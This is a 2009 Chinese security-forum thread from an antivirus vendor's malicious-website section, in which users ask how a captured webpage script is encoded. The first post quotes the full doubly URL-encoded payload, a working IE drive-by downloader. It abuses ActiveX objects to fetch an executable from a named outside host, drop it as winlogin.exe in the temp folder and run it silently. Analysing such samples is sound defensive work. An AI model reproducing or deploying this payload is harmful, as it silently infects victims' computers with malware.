瑞星卡卡安全论坛技术交流区恶意网站交流 关于networkedition贴子的一点问题??

1   1  /  1  页   跳转

[讨论] 关于networkedition贴子的一点问题??

关于networkedition贴子的一点问题??

对下面这段代码两次ESC后得到“http://quxiao.91.tc/xzz.exe(不要轻易执行,小心中招)”,但对下面这段代码有点不理解,shellcode 通常解法也是两次ESC即可解出,而shellcode 的特征为:由特定分隔符分隔(通常为%u)4位一组,但下面这段代码貌似不像;我不明白下面这段是什么?有哪些特征或规则,请版主牛人们不吝赐教,谢谢了。

<SCRIPT>var Words="%3CHTML%3E%0D%0A%3CHEAD%3E%0D%0A%3CSCRIPT LANGUAGE%3D%22Javascript%22%3E%0D%0A%3C%21%2D%2D%0D%0Avar Words %3D%22%253Chtml%253E%250D%250A%2520%253Cscript%2520language%253D%2522VBScript%2522%253E%250D%250A%2520%2520%2520%2520on%2520error%2520resume%2520next%250D%250A%2520%2520%2520%2520dl%2520%253D%2520%2522http%253A%252F%252Fquxiao%252E91%252Etc%252Fxzz%252Eexe%2522%250D%250A%2520%2520%2520%2520Set%2520df%2520%253D%2520document%252EcreateElement%2528%2522object%2522%2529%250D%250A%2520%2520%2520%2520df%252EsetAttribute%2520%2522classid%2522%252C%2520%2522clsid%253ABD96C556%252D65A3%252D11D0%252D983A%252D00C04FC29E36%2522%250D%250A%2520%2520%2520%2520str%253D%2522Microsoft%252EXMLHTTP%2522%250D%250A%2520%2520%2520%2520Set%2520x%2520%253D%2520df%252ECreateObject%2528str%252C%2522%2522%2529%250D%250A%2520%2520%2520%2520a1%253D%2522Ado%2522%250D%250A%2520%2520%2520%2520a2%253D%2522db%252E%2522%250D%250A%2520%2520%2520%2520a3%253D%2522Str%2522%250D%250A%2520%2520%2520%2520a4%253D%2522eam%2522%250D%250A%2520%2520%2520%2520str1%253Da1%2526a2%2526a3%2526a4%250D%250A%2520%2520%2520%2520str5%253Dstr1%250D%250A%2520%2520%2520%2520set%2520S%2520%253D%2520df%252Ecreateobject%2528str5%252C%2522%2522%2529%250D%250A%2520%2520%2520%2520S%252Etype%2520%253D%25201%250D%250A%2520%2520%2520%2520str6%253D%2522GET%2522%250D%250A%2520%2520%2520%2520x%252EOpen%2520str6%252C%2520dl%252C%2520False%250D%250A%2520%2520%2520%2520x%252ESend%250D%250A%2520%2520%2520%2520fname1%253D%2522winlogin%252Eexe%2522%250D%250A%2520%2520%2520%2520set%2520F%2520%253D%2520df%252Ecreateobject%2528%2522Scripting%252EFileSystemObject%2522%252C%2522%2522%2529%250D%250A%2520%2520%2520%2520set%2520tmp%2520%253D%2520F%252EGetSpecialFolder%25282%2529%2520%250D%250A%2520%2520%2520%2520fname1%253D%2520F%252EBuildPath%2528tmp%252Cfname1%2529%250D%250A%2520%2520%2520%2520S%252Eopen%250D%250A%2520%2520%2520%2520S%252Ewrite%2520x%252EresponseBody%250D%250A%2520%2520%2520%2520S%252Esavetofile%2520fname1%252C2%250D%250A%2520%2520%2520%2520S%252Eclose%250D%250A%2520%2520%2520%2520set%2520Q%2520%253D%2520df%252Ecreateobject%2528%2522Shell%252EApplication%2522%252C%2522%2522%2529%250D%250A%2520%2520%2520%2520Q%252EShellExecute%2520fname1%252C%2522%2522%252C%2522%2522%252C%2522open%2522%252C0%250D%250A%2520%2520%2520%2520%253C%252Fscript%253E%250D%250A%2520%2520%2520%2520%253Chead%253E%250D%250A%2520%2520%2520%2520%253Ctitle%253E%25u65B0%25u4E16%25u7EAA%25u7F51%25u5B89%25u57FA%25u5730%253C%252Ftitle%253E%250D%250A%2520%2520%2520%2520%253C%252Fhead%253E%253Cbody%253E%250D%250A%2509%253Ccenter%253Ehttp%253A%252F%252Fwww%252E520hack%252Ecom%252F%25u5360%25u6709%25u8005%25u5236%25u4F5C%252C%25u8054%25u7CFBQQ%253A8338850%252E%253C%252Fcenter%253E%250D%250A%2520%2520%2520%2520%253C%252Fbody%253E%253C%252Fhtml%253E%250D%250A%22%0D%0Afunction SetNewWords%28%29%0D%0A%7B%0D%0Avar NewWords%3B%0D%0ANewWords %3D unescape%28Words%29%3B%0D%0Adocument%2Ewrite%28NewWords%29%3B%0D%0A%7D%0D%0ASetNewWords%28%29%3B%0D%0A%2F%2F %2D%2D%3E%0D%0A%3C%2FSCRIPT%3E%0D%0A%3C%2FHEAD%3E%0D%0A%3CBODY%3E%0D%0A%3C%2FBODY%3E%0D%0A%3C%2FHTML%3E%0D%0A";document.write(unescape(Words))</SCRIPT>
链接:http://quxiao.91.tc/www.htm

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; CIBA; 360SE)
最后编辑networkedition 最后编辑于 2009-08-22 23:59:17
分享到:
gototop
 

回复:关于networkedition贴子的一点问题??

呵呵,各位版主都在啊,这个用decoder和freshow 都可解出。

我不明白的是它用哪种方式加的密,有哪些特征或规则???
gototop
 

回复:关于networkedition贴子的一点问题??

呵呵,你很细心啊,3Q
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT